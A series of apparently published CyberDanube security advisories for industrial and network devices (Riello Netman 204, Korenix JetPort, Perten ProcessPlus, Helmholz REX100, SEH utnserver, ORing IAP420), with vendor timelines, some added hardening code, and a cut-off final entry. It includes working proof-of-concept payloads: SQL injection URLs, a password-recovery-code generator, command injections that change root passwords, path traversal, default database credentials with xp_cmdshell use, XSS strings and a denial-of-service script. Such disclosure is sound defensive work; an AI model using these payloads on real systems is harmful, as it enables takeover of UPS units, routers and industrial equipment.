[EN] Multiple Vulnerabilities in Riello Netman 204 https://cyberdanube.com/en/en-multiple-vulnerabilities-in-riello-netman-204/ Thu, 19 Sep 2024 10:47:51 +0000 https://cyberdanube.com/en/?p=4605

Title: Multiple Vulnerabilities
Product: Netman 204
Vulnerable version: 4.05
Fixed version: None
CVE: CVE-2024-8877, CVE-2024-8878
Impact: High
Homepage: https://www.riello-ups.com/
Found: 2024-05-17


The Netman 204 series is prone to unauthenticated SQL injection that allows modification of energy measurement entries. Furthermore, the password reset function of the UPS can be abused to reset the password without involving Riello support, because the recovery code for resetting the password can be calculated.

Vendor description

“Riello Elettronica, led by Cav. Lav. Pierantonio Riello, has a presence today in the Electrical manufacturing industry with two divisions: Energy, Automation and Security. It is a leader in the Uninterruptible Power Supply market with the well-known brand Riello UPS. Energy represents the Group’s core business, in particular with the manufacture of UPS that are firstly able to guarantee the quality of electricity and secondly maintain normal operation and continuity in case of blackouts or anomalies in the energy supply. Riello UPS designs and produces strategical solutions for every kind of requirement and make a bespoke offering according to the clients’ needs: from banks to the hospitals, transport to infrastructures, from domestic use to data centres.”

Source: https://www.riello-ups.com/pages/41-the-riello-elettronica-group

Vulnerable versions

NetMan 204 / 4.05

Vulnerability overview

1) SQL Injection (CVE-2024-8877)
The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.

2) Unauthenticated Password Reset (CVE-2024-8878)
By navigating to the endpoint /recoverpassword.html an attacker can obtain the netmanid from the UPS. This id can be used to calculate the recovery code for resetting the password. This enables an attacker to take over control of the UPS and, for example, turn it off.

Proof of Concept

1) SQL Injection (CVE-2024-8877)

The system is susceptible to SQL injection, as illustrated by the following payloads:

AND 1=0:
/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%270

AND 1=1:
/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271

The first request does not return any data, while the second request returns all entries with a start and end date in the given interval.
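To show why the two payloads above return different results and how a parameterized query removes the difference, here is an added Python example (not the device's code; the event log table and its rows are constructed, since the real schema is not known):

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample data: a minimal stand-in for the device's event log table.
SAMPLE_ROWS = [
    (1715610000, "info", "ups", "constructed: mains power ok"),
    (1715620000, "warning", "battery", "constructed: battery low"),
    (1715625000, "info", "net", "constructed: link up"),
]

# The two requests from the advisory (AND 1=0 and AND 1=1 variants).
URL_FALSE = ("/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160"
             "&gravity=%25&type=%25%27and/**/%271%27=%270")
URL_TRUE = ("/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160"
            "&gravity=%25&type=%25%27and/**/%271%27=%271")


def build_db():
    """Create the in-memory sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE eventlog (ts INTEGER, gravity TEXT, type TEXT, msg TEXT)")
    conn.executemany("INSERT INTO eventlog VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def parse_params(url):
    """Decode the query string the way a CGI sees it (%25 -> %, %27 -> ')."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def count_vulnerable(conn, p):
    """String-built WHERE clause: the decoded 'type' value becomes part of the SQL
    text, so the closing quote, the AND and the comment in the payload are parsed as SQL."""
    sql = ("SELECT COUNT(*) FROM eventlog WHERE ts BETWEEN {} AND {} "
           "AND gravity LIKE '{}' AND type LIKE '{}'").format(
               p["date_start"], p["date_end"], p["gravity"], p["type"])
    return conn.execute(sql).fetchone()[0]


def count_parameterized(conn, p):
    """Hardened form: bound parameters keep the payload a literal LIKE pattern,
    and the timestamps are converted to integers before they reach the query."""
    sql = ("SELECT COUNT(*) FROM eventlog WHERE ts BETWEEN ? AND ? "
           "AND gravity LIKE ? AND type LIKE ?")
    args = (int(p["date_start"]), int(p["date_end"]), p["gravity"], p["type"])
    return conn.execute(sql, args).fetchone()[0]


def compare(url):
    """Return (row count from the injectable query, row count from the parameterized query)."""
    conn = build_db()
    p = parse_params(url)
    return count_vulnerable(conn, p), count_parameterized(conn, p)


if __name__ == "__main__":
    print("AND 1=0:", compare(URL_FALSE))  # (0, 0)
    print("AND 1=1:", compare(URL_TRUE))   # (3, 0): the injected condition opens the filter
```

With the parameterized query both payloads yield the same (empty) result, which is exactly the boolean-based signal the advisory's two requests rely on disappearing.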

2) Unauthenticated Password Reset (CVE-2024-8878)

The following Python script generates the recovery code from the netmanid:

import hashlib
import sys


def calc_code(netman_id):
    # The first three bytes of the netmanid are replaced by the fixed secret "NMP"
    secret = b"NMP"
    netman_id = secret + netman_id[3:]
    # MD5 hex digest, then SHA-1 of that hex string; 7 hex characters from offset 5 form the code
    round1 = hashlib.md5(netman_id).hexdigest().encode("utf-8")
    round2 = hashlib.sha1(round1).hexdigest()
    code = round2[5:5 + 7]
    return code


if len(sys.argv) < 2:
    sys.exit("usage: {} netman_id".format(sys.argv[0]))
netman_id = sys.argv[1]
print(calc_code(netman_id.encode("utf-8")))

Inputting the recovery code in "/recoverpassword.html" resets the login credentials to admin:admin.

Solution

None.

Workaround

Limit access to the device.

Recommendation

Riello should release a firmware update that fixes the mentioned vulnerabilities.
Customers should not use this device in productive networks.


Contact Timeline

  • 2024-05-21: Contacting Riello UPS Group via riello@riello-ups.com.
  • 2024-06-06: Contacting Riello UPS Group via security-incident@riello-ups.com.
  • 2024-06-10: Received confirmation that the issue is being looked into.
  • 2024-07-22: Asking Riello UPS Group for a status of the update.
  • 2024-07-22: Contact stated that there is no planned date for the update.
  • 2024-08-05: Asking Riello UPS Group for a status of the update and telling them that the advisory will be published on 2024-09-19 after a 90-day period as stated in our Responsible Disclosure Agreement.
  • 2024-08-07: Contact stated that there is no news regarding the update and that it would take longer than 2024-09-19.
  • 2024-08-13: Asking Riello UPS Group about news on the update and a possible release date.
  • 2024-08-26: Contact stated that there is no information regarding the update.
  • 2024-09-19: Advisory published.

Author

David Blagojevic is a Security Researcher at CyberDanube. He is currently engaged in research activities within the fields of firmware emulation and firmware analysis, where he is contributing to the development and advancement of the MEDUSA Firmware Emulation Framework.

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

[EN] Multiple Vulnerabilities in Korenix JetPort https://cyberdanube.com/en/en-multiple-vulnerabilities-in-korenix-jetport/ Sun, 04 Aug 2024 14:00:09 +0000 https://cyberdanube.com/en/?p=4597

Title: Multiple Vulnerabilities
Product: Korenix JetPort
Vulnerable version: <=1.2
Fixed version: None
CVE: CVE-2024-7395, CVE-2024-7396, CVE-2024-7397
Impact: High
Homepage: https://korenix.com/
Found: 2024-04-01


The JetPort series is prone to unauthenticated command injection, which allows an attacker to fully compromise the device from the network.

Vendor description

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. […]”

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions

JetPort 5601v3 / v1.2

Vulnerability overview

1) Insufficient Authentication (CVE-2024-7395)
The configuration service on port 600/tcp doesn't require authentication. This allows an attacker to change the password or other critical information.

2) Plaintext Communication (CVE-2024-7396)
The communication of the configuration service is transmitted in plain text. An attacker could use this information to sniff passwords or other critical information.

3) Unauthenticated Command Injection (CVE-2024-7397)
An attacker with network access can execute arbitrary commands as the root user via the management service on port 600/tcp.

Proof of Concept

1) Insufficient Authentication (CVE-2024-7395)

The management software JetPort Commander is used as a frontend for the telnet service on 600/tcp. While it is possible to set a password, the password is sent to the software in cleartext and is validated in the client software rather than on the device. An attacker can bypass the management software by using telnet to connect directly to the port. This allows them to reconfigure the device, including passwords and access controls.

$ telnet 192.168.122.76 600
Trying 192.168.122.76...
Connected to 192.168.122.76.
Escape character is '^]'.
-> setpassword poc

target:/$ cat /tmp/com2ip.conf
version:1.2.0
model:JetPort5601v3
name:JetPort5601v3-DEFAULT
serialno:0000000000000000
password:poc
switchmode:redundant
network:static:192.168.122.76:192.168.10.1:192.168.10.1

2) Plaintext Communication (CVE-2024-7396)

The management service uses telnet as protocol. We used tcpdump to inspect the traffic during a password change. The new password (newpass) is readable during transmission.

# sudo tcpdump -i virbr0 dst port 600 -X
14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21
        0x0000:  4500 003d 16a7 4000 8006 6d86 c0a8 7af0  E..=..@...m...z.
        0x0010:  c0a8 7a4c c1c0 0258 522b 6096 12eb 337d  ..zL...XR+`...3}
        0x0020:  5018 4026 76bd 0000 7365 7470 6173 7377  P.@&v...setpassw
        0x0030:  6f72 6420 6e65 7770 6173 730d 0a         ord.newpass..

3) Unauthenticated Remote Code Execution (CVE-2024-7397)

The management service on port 600/tcp is used to configure JetPort devices over the network. An attacker can inject arbitrary commands in multiple settings options. The binary ser2net receives the data via the telnet protocol and translates it to arguments for system() calls. For our PoC we used the setsntp option to create the file /tmp/pwned.

$ telnet 192.168.122.76 600
Trying 192.168.122.76...
Connected to 192.168.122.76.
Escape character is '^]'.
-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1
OK
->

target:/$ ls -rtlha /tmp/
drwxrwxr-x 17 root 0 1.0k Apr 4 10:41 ..
-rw-r--r-- 1 root 0 4 Apr 4 12:28 thttpd.pid
-rw-r--r-- 1 root 0 712 Apr 4 12:29 com2ip.conf
-rw-r--r-- 1 root 0 0 Apr 4 12:33 pwned
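An added Python example (not Korenix or ser2net code) of how a setsntp line such as the one above can be handled safely: the four comma-separated fields are checked against strict allowlists and then passed as an argument vector instead of being pasted into a shell string for system(). The helper binary name is an assumption.

```python
import re

# RFC 1123 hostname: labels of letters, digits and hyphens; dotted IPv4 literals also match.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
# tz database style names such as Asia/Taipei or America/Argentina/Buenos_Aires.
TIMEZONE_RE = re.compile(r"^[A-Za-z][A-Za-z_]*(/[A-Za-z_][A-Za-z0-9_+-]*){0,2}$")
# Assumed helper that receives the validated fields as separate arguments.
SNTP_HELPER = "/usr/sbin/set_sntp"


class InvalidSetting(ValueError):
    """Raised when a setsntp line does not match the expected format."""


def parse_setsntp(line):
    """Parse 'setsntp <server>,<port>,<timezone>,<enable>' into validated fields."""
    command, _, argument = line.strip().partition(" ")
    if command != "setsntp":
        raise InvalidSetting("not a setsntp command")
    fields = [f.strip() for f in argument.split(",")]
    if len(fields) != 4:
        raise InvalidSetting("expected 4 comma-separated fields")
    server, port, timezone, enable = fields
    # Every field is matched against an allowlist; shell metacharacters such as
    # '$', '(', ';' or backticks never pass any of these checks.
    if not HOSTNAME_RE.match(server):
        raise InvalidSetting("server is not a valid hostname or IPv4 address")
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        raise InvalidSetting("port must be an integer between 1 and 65535")
    if not TIMEZONE_RE.match(timezone):
        raise InvalidSetting("timezone is not a tz database name")
    if enable not in ("0", "1"):
        raise InvalidSetting("enable flag must be 0 or 1")
    return {"server": server, "port": int(port),
            "timezone": timezone, "enable": enable == "1"}


def sntp_argv(settings):
    """Argument vector for subprocess.run(argv): no shell is involved, so even a
    value that slipped through validation could not be interpreted as a command."""
    return [SNTP_HELPER, settings["server"], str(settings["port"]),
            settings["timezone"], "1" if settings["enable"] else "0"]


def is_accepted(line):
    """True if the line passes validation, False if it is rejected."""
    try:
        parse_setsntp(line)
    except InvalidSetting:
        return False
    return True


if __name__ == "__main__":
    benign = "setsntp pool.ntp.org,123,Asia/Taipei,1"
    injected = "setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1"  # line from the PoC above
    print(sntp_argv(parse_setsntp(benign)))
    print(is_accepted(injected))  # False
```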

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

None. Device is End-of-Life.

Workaround

Limit the access to the device and place it within a segmented network.

Recommendation

CyberDanube recommends that Korenix customers remove the device from their network topology.


Contact Timeline

  • 2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
  • 2024-05-07: Received confirmation that the issue is being looked into.
  • 2024-06-10: Contact stated that the product is considered EoL and will no longer receive security updates.
  • 2024-06-10: Confirmed receipt and told them that we will publish the advisory after our 90-day deadline.
  • 2024-08-05: Publication of the Advisory.

Author

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

[EN] Multiple Vulnerabilities in Perten ProcessPlus https://cyberdanube.com/en/en-multiple-vulnerabilities-in-perten-processplus/ Sun, 21 Jul 2024 12:08:32 +0000 https://cyberdanube.com/en/?p=4587

Title: Multiple Vulnerabilities
Product: Perten ProcessPlus
Vulnerable version: <=1.11.6507.0
Fixed version: 2.0.0
CVE: CVE-2024-6911, CVE-2024-6912, CVE-2024-6913
Impact: High
Homepage: https://perkinelmer.com/
Found: 2024-04-24


The ProcessPlus measurement software is prone to local file inclusion, uses default MSSQL credentials, and is executed with unnecessarily high privileges.

Vendor description

“For 85 years, PerkinElmer has pushed the boundaries of science from food to health to the environment. We’ve always pursued science with a clear purpose – to help our customers achieve theirs. Our expert team brings technology and intangibles, like creativity, empathy, diligence, and a spirit of collaboration, in equal measure, to fulfill our customers’ desire to work better, innovate better, and create better.

PerkinElmer is a leading, global provider of technology and service solutions that help customers measure, quantify, detect, and report in ways that help ensure the quality, safety, and satisfaction of their products.”

Source: https://www.perkinelmer.com/

Vulnerable versions

ProcessPlus Software / <=1.11.6507.0

Vulnerability overview

1) Unauthenticated Local File Inclusion (CVE-2024-6911)
An LFI was identified in the web interface of the device. An attacker can use this vulnerability to read system-wide files and configuration.

2) Hardcoded MSSQL Credentials (CVE-2024-6912)
The software is using the same MSSQL credentials across multiple installations. In combination with 3), this allows an attacker to fully compromise the host.

3) Execution with Unnecessary Privileges (CVE-2024-6913)
The software uses the user “sa” to connect to the database. Access to this account allows an attacker to execute commands via the “xp_cmdshell” procedure.

Proof of Concept

1) Unauthenticated Local File Inclusion (CVE-2024-6911)

The LFI can be triggered by using the following GET Request:

GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1
Host: 192.168.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

This example returns the content of "C:\Windows\System32\drivers\etc\hosts" from an affected installation.
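As an added example (not PerkinElmer's code) of the check the download handler lacks, this Python function normalizes the requested filename against a fixed log directory and rejects anything that escapes it. The base directory C:\Perten\ProcessPlus\Log is an assumption; the advisory only shows a log file under that directory.

```python
import ntpath
from urllib.parse import parse_qs, urlsplit

# Assumed base directory of the downloadable log files (not stated in the advisory).
LOG_DIR = r"C:\Perten\ProcessPlus\Log"

# The request line from the PoC above.
TRAVERSAL_REQUEST_LINE = (
    r"GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts"
    r"&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1")


def resolve_log_download(filename, base=LOG_DIR):
    """Return the normalized Windows path for 'filename' if it stays inside 'base', else None.

    ntpath is used deliberately so the check behaves like Windows path handling on any
    platform: it collapses '..' and '.', treats '/' and '\\' alike, and honours drive
    letters and rooted paths (an absolute filename replaces the base instead of joining).
    """
    if not filename:
        return None
    candidate = ntpath.normpath(ntpath.join(base, filename))
    base_norm = ntpath.normcase(ntpath.normpath(base))
    # Case-insensitive comparison; the candidate must lie strictly below the base directory.
    if not ntpath.normcase(candidate).startswith(base_norm + "\\"):
        return None
    return candidate


def check_request_line(request_line):
    """Parse a raw 'GET <target> HTTP/1.x' line and resolve its 'filename' parameter."""
    _method, target, _version = request_line.split(" ", 2)
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    filename = params.get("filename", [""])[0]
    return resolve_log_download(filename)


if __name__ == "__main__":
    print(check_request_line(TRAVERSAL_REQUEST_LINE))   # None: escapes the log directory
    print(resolve_log_download("_Errors_2102162.log"))  # C:\Perten\ProcessPlus\Log\_Errors_2102162.log
```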

2) Hardcoded MSSQL Credentials (CVE-2024-6912)

Analysis across multiple installations shows that the configuration file "\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials:

[…]
<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;
DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1"
appid="Perten.OPCDA.Server" loglevel="info"
logfile="C:\Perten\ProcessPlus\Log\opcserver.log">
[…]

These credentials "sa:enilno" were reused in all reviewed installations.

3) Execution with Unnecessary Privileges (CVE-2024-6913)

The application uses the “sa” user to authenticate with the database. By using Metasploit an attacker can execute arbitrary commands:

msf6 auxiliary(admin/mssql/mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting
   ----                 ---------------
   CMD                  dir
   PASSWORD             enilno
   RHOSTS               192.168.0.1
   RPORT                1433
   TDSENCRYPTION        false
   TECHNIQUE            xp_cmdshell
   USERNAME             sa
   USE_WINDOWS_AUTHENT  false

msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.0.1

[*] 192.168.0.1:1433 - SQL Query: EXEC master..xp_cmdshell 'dir'

[…]
Directory of C:\Windows\system32
01/23/2024 13:37 AM <DIR> .
01/23/2024 13:37 AM <DIR> ..
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM 232 @AppHelpToast.png
01/23/2024 13:37 AM 308 @AudioToastIcon.png
[…]

Solution

Update to version 2.0.0.

Workaround

Restrict network access to the host with the installed software. Change the default credentials of the database in the config file and the database itself.

Recommendation

CyberDanube recommends Perten customers to upgrade the software to the latest version available and to restrict network access to the management interface.


Contact Timeline

  • 2024-04-29: Contacting PerkinElmer via dpo@perkinelmer.com.
  • 2024-05-13: Vendor asked for unencrypted advisory.
  • 2024-05-16: Sent advisory to vendor.
  • 2024-05-22: Asked for status update. No answer.
  • 2024-05-28: Asked for status update. Contact stated that they are working on a fix.
  • 2024-06-10: Asked for status update. Contact stated that all issues should be fixed by end of month. Local file inclusion should be fixed in version 1.16. Asked for a release date of version 1.16. No answer.
  • 2024-07-13: Asked for status update.
  • 2024-07-15: Contact stated that all three issues have been fixed in version 2.0.0, which was released on 2024-07-11.
  • 2024-07-16: Asked for a link to the firmware update release.
  • 2024-07-17: Set release date to 2024-07-22.
  • 2024-07-22: Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

Authenticated Command Injection in Helmholz REX100 Router https://cyberdanube.com/en/authenticated-command-injection-in-helmholz-rex100-router/ Wed, 03 Jul 2024 07:38:24 +0000 https://cyberdanube.com/en/?p=4579

Title: Authenticated Command Injection
Product: Helmholz Industrial Router REX100, MBConnectline mbNET.mini
Vulnerable version: <= 2.2.11
Fixed version: 2.2.13
CVE: CVE-2024-5672
Impact: High
Homepage: https://www.helmholz.de/, https://mbconnectline.com/
Found: 2024-05-08


The Helmholz REX100 router is prone to an authenticated command injection attack. This allows an attacker to gain root access on the router, which usually acts as a key infrastructure device in OT environments.

Vendor description

Helmholz is your specialist when it comes to sophisticated products for your automation projects. With current, clever system solutions from Helmholz, the high demands placed on industrial networks in times of increasing automation can be met both reliably and efficiently – including a high level of operating convenience. The broad product spectrum ranges from a decentralized I/O system to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT remote machine access.

Source: https://www.helmholz.de/en/company/about-helmholz/

Vulnerable versions

Helmholz Industrial Router REX100 <= 2.2.11
MBConnectline mbNET.mini <= 2.2.11

Vulnerability overview

1) Authenticated Command Injection (CVE-2024-5672)

A command injection was identified on the webserver. This vulnerability can only be exploited if a user is authenticated on the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device.

Proof of Concept

1) Authenticated Command Injection (CVE-2024-5672)

The following GET request changes the password for the root user and returns the process list of the device.

GET /cgi-bin/ping;echo$IFS'root:password'|chpasswd;ps;.sh HTTP/1.1
Host: 192.168.25.11
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.0 200 OK
This is haserl version 0.8.0
This program runs as a cgi interpeter, not interactively.
Bug reports to: Nathan Angelacos <nangel@users.sourceforge.net>

Password for 'root' changed
PID USER VSZ STAT COMMAND
1 root 2292 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
4 root 0 SW [events/0]
5 root 0 SW [khelper]
8 root 0 SW [async/mgr]
[…]

Solution

Update to latest version: 2.2.13

Workaround

None

Recommendation

CyberDanube recommends Helmholz customers to upgrade the firmware to the latest version available and to restrict network access to the management interface of the device.


Contact Timeline

  • 2024-05-15: Contacting Helmholz via psirt@helmholz.de.
  • 2024-05-15: Receiving security contact for MBConnectline.
  • 2024-05-21: Contact stated they are working on a fix.
  • 2024-06-13: Received advisory from contact and assigned CVE number.
  • 2024-07-01: Contact sends out final release date.
  • 2024-07-03: Coordinated release of advisory with CERT@VDE.

Author

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems, firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.

[EN] Multiple Vulnerabilities in SEH untserver Pro https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/ Mon, 03 Jun 2024 08:21:43 +0000 https://cyberdanube.com/en/?p=4568

Title: Multiple Vulnerabilities
Product: SEH utnserver Pro
Vulnerable version: 20.1.22
Fixed version: 20.1.28
CVE: CVE-2024-5420, CVE-2024-5421, CVE-2024-5422
Impact: High
Homepage: https://www.seh-technology.com/
Found: 2024-03-04


The utnserver Pro is prone to stored cross-site scripting, file disclosure and denial-of-service attacks. This allows an attacker to deactivate the device or place malicious code in the web interface of the utnserver.

Vendor description

We are SEH from Bielefeld – manufacturer of high-quality network solutions. With over 35 years of experience in the fields of printing and networks, we offer our customers a broad and high-level expertise in solutions for all types of business environments.

Source: https://www.seh-technology.com/us/company/about-us.html

Vulnerable versions

utnserver Pro / 20.1.22
utnserver ProMAX / 20.1.22
INU-100 / 20.1.22

Vulnerability overview

1) Stored Cross-Site Scripting (CVE-2024-5420)

A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. Multiple parameters, e.g. the device description, can be abused to inject JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user.

2) Authenticated File Disclosure (CVE-2024-5421)
Files and content of directories can be disclosed by integrated functions of the device.

3) Denial of Service (CVE-2024-5422)
A Denial-of-Service vulnerability has been identified in the web interface of the device. This can be triggered by sending a lot of requests that trigger serial interface access on the device.

Proof of Concept

1) Stored Cross-Site Scripting (CVE-2024-5420)

By accessing the following URL, an attacker can modify the device description:
http://$IP/device/description_en.html

By using a malicious JavaScript payload, it is possible to execute arbitrary script code in the browser of anyone viewing the description. This snippet demonstrates such a payload:

"><script>alert(document.location)</script>

Saving this text as the device description leads to persistent cross-site scripting: everyone who opens the device description executes the injected code in the context of their own browser.

2) Authenticated File Disclosure (CVE-2024-5421)

A hidden function in the web interface of the device can be used to disclose directories and files at operating system level. The function can be accessed directly via the browser:

http://$IP/info/dir?/

This lists the current directory and provides the files to be downloaded.

3) Denial of Service (CVE-2024-5422)

For triggering a denial of service on the device, multiple file descriptors are opened by using the following script:

#!/bin/bash
# usage: ./poc.sh <host> <number of parallel downloads>
echo "Parameters: $1 $2"
last_iter=$(($2 - 1))
for ((i=1; i<=$2; i++))
do
    echo "[$i] Downloading application binary"
    # all downloads but one run in the background, so the file descriptors stay open concurrently
    if [[ "$i" == "$last_iter" ]]; then
        curl "http://$1/info/file?/application" --output "./file_${i}.txt" &> /dev/null
    else
        curl "http://$1/info/file?/application" --output "./file_${i}.txt" &> /dev/null &
    fi
done

The vulnerabilities were manually tested on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com) and verified on a real device.

Solution

Install firmware version 20.1.28 to fix the vulnerabilities.

Workaround

None

Recommendation

CyberDanube recommends SEH Computertechnik customers to upgrade the firmware to the latest version available.


Contact Timeline

  • 2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent advisory to support.
  • 2024-03-20: Asked for an update. Contact stated, that an internal timeline will be defined.
  • 2024-04-10: Asked for an update. Contact stated, that the vulnerabilities will be patched soon.
  • 2024-04-16: Contact sent link to patched firmware release candidate.
  • 2024-05-31: Notified SEH Computertechnik that advisory will be released first week of June. Received confirmation from SEH Computertechnik.
  • 2024-06-04: Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

[EN] Multiple Vulnerabilities in ORing IAP420 https://cyberdanube.com/en/en-multiple-vulnerabilities-in-oring-iap420/ Mon, 27 May 2024 11:41:51 +0000 https://cyberdanube.com/en/?p=4560

Title: Multiple Vulnerabilities
Product: ORing IAP-420
Vulnerable version: 2.01e
Fixed version: –
CVE: CVE-2024-5410, CVE-2024-5411
Impact: High
Homepage: https://oringnet.com/
Found: 2024-01-19


The ORing IAP420 is prone to authenticated command injection and stored cross-site scripting. Therefore, an attacker can fully compromise the device via the management interface.

Vendor description

Founded in 2005, ORing specializes in developing innovative own-branded products for industrial settings. Over the years, ORing has accumulated abundant experience in wired and wireless network communications industry. In line with the commercialization of 5G, ORing has stretched its arm into the IIoT field, helping customers realize all kinds of IIoT applications such as smart manufacturing, smart city, and industrial automation. With high product quality and best customer services in mind, ORing has continued to launch cutting-edge products catering to customer needs. ORing’s products have been widely adopted in surveillance, rail transport, industrial automation, power substations, renewable energy, and marine industries with offices worldwide to address customer needs in real time.

Source: https://oringnet.com/en/about-us/company-profile

Vulnerable versions

Tested on ORing IAP420 / 2.01e

Vulnerability overview

1) Stored Cross-Site Scripting (CVE-2024-5410)

A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. The SSID of the WiFi can be configured to contain arbitrary JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user.

2) Authenticated Command Injection (CVE-2024-5411)
The filename parameter of the config file upload is prone to a Command Injection vulnerability. This vulnerability can only be exploited if a user is authenticated to the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device.

Proof of Concept

1) Stored Cross-Site Scripting (CVE-2024-5410)

Stored Cross-Site Scripting can be triggered by placing JavaScript code into the SSID input field of the web interface as an authenticated user. A single request for injecting the script is shown below:

POST /cgi-bin/wl_set.cgi HTTP/1.1
Host: 192.168.0.1
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 659
Connection: keep-alive
Cookie: auth=YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1

sel_op_mode=client&sel_mssid=0&tf_ssid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sel_isolation=0&
sel_mssid_isolation=0&sel_auth_mode=0&rb_wep_authmode=0&sel_wep_enc_bits=0&
